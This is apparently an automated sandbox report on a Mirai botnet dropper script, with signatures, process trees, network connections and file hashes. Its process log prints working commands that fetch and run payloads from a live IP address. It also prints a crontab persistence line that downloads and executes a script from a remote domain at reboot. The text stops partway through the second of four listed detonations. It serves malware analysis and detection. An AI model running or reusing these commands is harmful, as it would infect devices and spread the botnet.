Malware Analysis Report

2024-11-13 18:02

Sample ID 241109-klez1s1fmf
Target l.sh
SHA256 7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd
Tags mirai botnet botnet defense_evasion discovery execution persistence privilege_escalation
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral3
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral4
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score 10/10

SHA256 7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd

Threat Level: Known bad

The file l.sh was found to be: Known bad.

Malicious Activity Summary

mirai botnet botnet defense_evasion discovery execution persistence privilege_escalation

Mirai family

Mirai

Unexpected DNS network traffic destination

File and Directory Permissions Modification

Renames itself

Executes dropped EXE

Creates/modifies Cron job

Enumerates running processes

Changes its process name

Reads runtime system information

Writes file to tmp directory

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 08:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 08:41

Reported

2024-11-09 08:43

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

138s

Max time network

146s

Command Line

[/tmp/l.sh]

Signatures

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A
N/A /mnt/dvrLocker /mnt/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A
N/A N/A /mnt/dvrLocker N/A
N/A N/A /mnt/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 5.161.109.23 N/A N/A
Destination IP 202.61.197.122 N/A N/A
Destination IP 64.176.6.48 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.kwgToV /usr/bin/crontab N/A
File opened for modification /var/spool/cron/crontabs/tmp.jeG6xK /usr/bin/crontab N/A
File opened for modification /var/spool/cron/crontabs/tmp.k7lYiR /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself [kswapd0] /tmp/lib/dvrLocker N/A
Changes the process name, possibly in an attempt to hide itself mini_httpd /mnt/dvrLocker N/A
Changes the process name, possibly in an attempt to hide itself [kswapd0] /mnt/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/l.sh N/A

Processes

/tmp/l.sh

[/tmp/l.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/1017/exe]

/bin/ls

[ls -l /proc/1022/exe]

/bin/ls

[ls -l /proc/1036/exe]

/bin/ls

[ls -l /proc/1042/exe]

/bin/ls

[ls -l /proc/1056/exe]

/bin/ls

[ls -l /proc/1060/exe]

/bin/ls

[ls -l /proc/1063/exe]

/bin/ls

[ls -l /proc/1066/exe]

/bin/ls

[ls -l /proc/1070/exe]

/bin/ls

[ls -l /proc/1080/exe]

/bin/ls

[ls -l /proc/1084/exe]

/bin/ls

[ls -l /proc/1093/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/1108/exe]

/bin/ls

[ls -l /proc/1113/exe]

/bin/ls

[ls -l /proc/1117/exe]

/bin/ls

[ls -l /proc/1121/exe]

/bin/ls

[ls -l /proc/1125/exe]

/bin/ls

[ls -l /proc/1129/exe]

/bin/ls

[ls -l /proc/1133/exe]

/bin/ls

[ls -l /proc/1138/exe]

/bin/ls

[ls -l /proc/1142/exe]

/bin/ls

[ls -l /proc/1143/exe]

/bin/ls

[ls -l /proc/1146/exe]

/bin/ls

[ls -l /proc/1149/exe]

/bin/ls

[ls -l /proc/115/exe]

/bin/ls

[ls -l /proc/1151/exe]

/bin/ls

[ls -l /proc/1161/exe]

/bin/ls

[ls -l /proc/1163/exe]

/bin/ls

[ls -l /proc/1165/exe]

/bin/ls

[ls -l /proc/1166/exe]

/bin/ls

[ls -l /proc/1171/exe]

/bin/ls

[ls -l /proc/1179/exe]

/bin/ls

[ls -l /proc/1182/exe]

/bin/ls

[ls -l /proc/1183/exe]

/bin/ls

[ls -l /proc/1184/exe]

/bin/ls

[ls -l /proc/1185/exe]

/bin/ls

[ls -l /proc/1188/exe]

/bin/ls

[ls -l /proc/1191/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/1226/exe]

/bin/ls

[ls -l /proc/1228/exe]

/bin/ls

[ls -l /proc/1255/exe]

/bin/ls

[ls -l /proc/1256/exe]

/bin/ls

[ls -l /proc/1269/exe]

/bin/ls

[ls -l /proc/1282/exe]

/bin/ls

[ls -l /proc/1287/exe]

/bin/ls

[ls -l /proc/1297/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/1308/exe]

/bin/ls

[ls -l /proc/1313/exe]

/bin/ls

[ls -l /proc/1317/exe]

/bin/ls

[ls -l /proc/1339/exe]

/bin/ls

[ls -l /proc/1349/exe]

/bin/ls

[ls -l /proc/137/exe]

/bin/ls

[ls -l /proc/1379/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/1478/exe]

/bin/ls

[ls -l /proc/1497/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/1503/exe]

/bin/ls

[ls -l /proc/1505/exe]

/bin/ls

[ls -l /proc/1506/exe]

/bin/ls

[ls -l /proc/1507/exe]

/bin/ls

[ls -l /proc/1509/exe]

/bin/ls

[ls -l /proc/159/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/160/exe]

/bin/ls

[ls -l /proc/161/exe]

/bin/ls

[ls -l /proc/162/exe]

/bin/ls

[ls -l /proc/163/exe]

/bin/ls

[ls -l /proc/164/exe]

/bin/ls

[ls -l /proc/165/exe]

/bin/ls

[ls -l /proc/166/exe]

/bin/ls

[ls -l /proc/167/exe]

/bin/ls

[ls -l /proc/168/exe]

/bin/ls

[ls -l /proc/169/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/170/exe]

/bin/ls

[ls -l /proc/171/exe]

/bin/ls

[ls -l /proc/172/exe]

/bin/ls

[ls -l /proc/173/exe]

/bin/ls

[ls -l /proc/174/exe]

/bin/ls

[ls -l /proc/175/exe]

/bin/ls

[ls -l /proc/176/exe]

/bin/ls

[ls -l /proc/178/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/203/exe]

/bin/ls

[ls -l /proc/204/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/244/exe]

/bin/ls

[ls -l /proc/25/exe]

/bin/ls

[ls -l /proc/26/exe]

/bin/ls

[ls -l /proc/269/exe]

/bin/ls

[ls -l /proc/27/exe]

/bin/ls

[ls -l /proc/28/exe]

/bin/ls

[ls -l /proc/29/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/30/exe]

/bin/ls

[ls -l /proc/309/exe]

/bin/ls

[ls -l /proc/31/exe]

/bin/ls

[ls -l /proc/313/exe]

/bin/ls

[ls -l /proc/32/exe]

/bin/ls

[ls -l /proc/34/exe]

/bin/ls

[ls -l /proc/35/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/405/exe]

/bin/ls

[ls -l /proc/412/exe]

/bin/ls

[ls -l /proc/436/exe]

/bin/ls

[ls -l /proc/443/exe]

/bin/ls

[ls -l /proc/454/exe]

/bin/ls

[ls -l /proc/457/exe]

/bin/ls

[ls -l /proc/463/exe]

/bin/ls

[ls -l /proc/466/exe]

/bin/ls

[ls -l /proc/472/exe]

/bin/ls

[ls -l /proc/473/exe]

/bin/ls

[ls -l /proc/474/exe]

/bin/ls

[ls -l /proc/476/exe]

/bin/ls

[ls -l /proc/480/exe]

/bin/ls

[ls -l /proc/484/exe]

/bin/ls

[ls -l /proc/485/exe]

/bin/ls

[ls -l /proc/487/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/516/exe]

/bin/ls

[ls -l /proc/523/exe]

/bin/ls

[ls -l /proc/535/exe]

/bin/ls

[ls -l /proc/542/exe]

/bin/ls

[ls -l /proc/552/exe]

/bin/ls

[ls -l /proc/573/exe]

/bin/ls

[ls -l /proc/597/exe]

/bin/ls

[ls -l /proc/598/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/634/exe]

/bin/ls

[ls -l /proc/648/exe]

/bin/ls

[ls -l /proc/649/exe]

/bin/ls

[ls -l /proc/651/exe]

/bin/ls

[ls -l /proc/658/exe]

/bin/ls

[ls -l /proc/670/exe]

/bin/ls

[ls -l /proc/697/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/744/exe]

/bin/ls

[ls -l /proc/757/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/79/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/80/exe]

/bin/ls

[ls -l /proc/81/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/83/exe]

/bin/ls

[ls -l /proc/84/exe]

/bin/ls

[ls -l /proc/85/exe]

/bin/ls

[ls -l /proc/89/exe]

/bin/ls

[ls -l /proc/895/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/ls

[ls -l /proc/949/exe]

/bin/ls

[ls -l /proc/950/exe]

/bin/ls

[ls -l /proc/98/exe]

/bin/ls

[ls -l /proc/985/exe]

/bin/ls

[ls -l /proc/990/exe]

/bin/ls

[ls -l /proc/993/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf x86]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf x86]

Network

Country  Destination             Domain                     Proto
N/A      224.0.0.251:5353        -                          udp
US       151.101.129.91:443      -                          tcp
UA       45.202.35.91:80         45.202.35.91               tcp
GB       185.125.188.61:443      -                          tcp
GB       185.125.188.62:443      -                          tcp
US       151.101.129.91:443      -                          tcp
UA       45.202.35.91:80         45.202.35.91               tcp
GB       89.187.167.38:443       -                          tcp
US       1.1.1.1:53              1527653184.rsc.cdn77.org   udp
US       1.1.1.1:53              1527653184.rsc.cdn77.org   udp
UA       45.202.35.91:80         45.202.35.91               tcp
GB       89.187.167.38:443       1527653184.rsc.cdn77.org   tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
US       5.161.109.23:53         kingstonwikkerink.dyn      udp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
CL       64.176.6.48:53          kingstonwikkerink.dyn      udp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
UA       45.202.35.91:80         45.202.35.91               tcp
DE       202.61.197.122:53       kingstonwikkerink.dyn      udp
HK       193.233.193.45:14781    kingstonwikkerink.dyn      tcp
CN       43.226.79.41:62371      -                          udp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/tmp/lib/dvrLocker

MD5 559f129d380ad1cfb60792c6b2dc3d32
SHA1 3997a0fc0bd5958783f1751364ec407c5b170adc
SHA256 fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA512 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

/tmp/lib/dvrLocker

MD5 d09db60a70d5b53b5b53ad39476fd7e8
SHA1 73a75e5e8200f77d857a7256cc0979077e29241d
SHA256 36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512 ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04

/tmp/lib/dvrLocker

MD5 f812a7b3a877f717eb6e54b843b41848
SHA1 21ee67d9a9b638621646e1b57fdc0f1eb0bdfa25
SHA256 9a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560
SHA512 c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732

/tmp/lib/dvrLocker

MD5 a016f79253a036ed87dd3ae118767cf2
SHA1 52c10912a82115af3a6dca21993c223a6e7c669d
SHA256 95f180a725b479687bdb9818991a68be75f0ba901c969cc93746e9996c1d0e50
SHA512 516191548c77eca021d07886a811f2fa6fc4be4f0321d5d61c1452cb22606877349a2dc80b03725f6e18fc0ce2524b0040baa6bdbabb40e9342da4401aa6e509

/tmp/lib/dvrLocker

MD5 78c772ea162b97132c3b76f6c313d326
SHA1 d45f7fc473e9e47185541bff467721386245e8e6
SHA256 a621a97a08419ab7d35eecb70ae4a9f8849f621101821ca84df3886252ace701
SHA512 fde9dc70c6cc6fa518a81cf52fe4bcba66c54afeb8986644dfa700bc1c9766f3d51160ebc7b2eb98c50c99a26b3caea541783b59d1bb208d8746f96121a70a00

/var/spool/cron/crontabs/tmp.jeG6xK

MD5 50615ad6e26d96511b53202a444c5adf
SHA1 5bd5689ac12e87808368ca533ac37de5e87a5572
SHA256 9d9de6a1533d670579c5ef30d6ec10792da69ea28cf2db0589549668ee5b5e5b
SHA512 815b123082890500949a2d90d67e9d202f02a03b112aedb71ca28efcf92d6e28b8ce49034f3111cf8e5eeb3296f381911be3835538f3928ead826af632400741

/mnt/dvrLocker

MD5 b1a1559b205459098f1fff627d35c808
SHA1 983f62052375084a8c125353e0c25b7cd19bd369
SHA256 e4837942ba2584de61bc3a75eba74f4eb0a137a7807130553c42d470c3ec01da
SHA512 3bb8ec38b6f3d17f7c7307785f609031b30056da380377bce27bdd48678cbbc81c4b7203ff511794ec6d23644952a82fa471e13149c014a91378f08305e6f60d

/var/spool/cron/crontabs/tmp.k7lYiR

MD5 9ed1c2ba0b84e3f738ead207c7035a35
SHA1 493f92e391ccf01c25c53e11a1b793240e79f5f6
SHA256 04195b12cd1400e8252bead74661e3384632a0bbcea5d8c52f8e0635bdc3919d
SHA512 705d28611e2f551e51df9e60b99c189244c4798674b9d114fbf3072a30418c8783bd1a7ee0991439e8b02ec9480d3848840299151bb2b86f328a7c08a08e12bc

/var/spool/cron/crontabs/tmp.kwgToV

MD5 fa18d8ddc32b949074f8e5955ee746e0
SHA1 66bf6733f867d38bf1506f2fcf730444c6eacee2
SHA256 52c9e4b1a2d1ca0b4de5f5f4cce9aa98ec17b37a49ed2fc1842bb78937765dc9
SHA512 a6a8017f1050d8f03eea7cf66522c39d64661c4d44c1642317c8ebf20d20c7d8e9f47e45bf01d512323195150cbee0dc3dd8da4bf90735b273a64eddaebc85ac

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 08:41

Reported

2024-11-09 08:43

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

150s

Command Line

[/tmp/l.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 152.53.15.127 N/A N/A
Destination IP 168.235.111.72 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.x2KALa /usr/bin/crontab N/A

Enumerates running processes

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself mini_httpd /tmp/lib/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/ls N/A
